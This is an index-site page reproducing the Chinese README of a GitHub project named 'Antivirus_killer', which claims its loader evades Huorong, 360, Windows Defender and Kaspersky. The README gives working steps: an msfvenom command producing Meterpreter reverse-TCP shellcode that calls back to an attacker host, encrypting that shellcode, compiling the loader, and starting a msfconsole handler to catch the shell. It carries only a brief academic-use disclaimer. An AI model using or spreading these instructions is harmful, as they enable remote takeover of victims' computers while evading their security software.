An open API service indexing awesome lists of open source software.

https://github.com/paokuwansui/Antivirus_killer

免杀主流防病毒软件
https://github.com/paokuwansui/Antivirus_killer

Last synced: 3 months ago
JSON representation

免杀主流防病毒软件

Awesome Lists containing this project

README

        

# Antivirus_killer
免杀主流防病毒软件

测试于2024年10月17日加载器2024_9_24(需配合新版加密器)可过最新版火绒、360核晶模式、windows自带杀软、卡巴斯基

该项目仅供学术交流参考,请大家合法学习和使用项目
# 使用方法
## 生成shellcode
msfvenom LHOST=x.x.x.x LPORT=443 -p windows/x64/meterpreter/reverse_tcp -f c
## 加密shellcode
将生成的shellcode复制到加密器.c的buf变量中并编译运行
## 编译加载器
将加密后的shellcode 复制到加载器的shellcode变量中编译
## 准备msf监听器
msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST x.x.x.x

set LPORT 443

run

## 双击编译好的exe观察是否上线
![image](https://github.com/user-attachments/assets/d840c522-d096-4e4d-805e-3aca6461b1d7)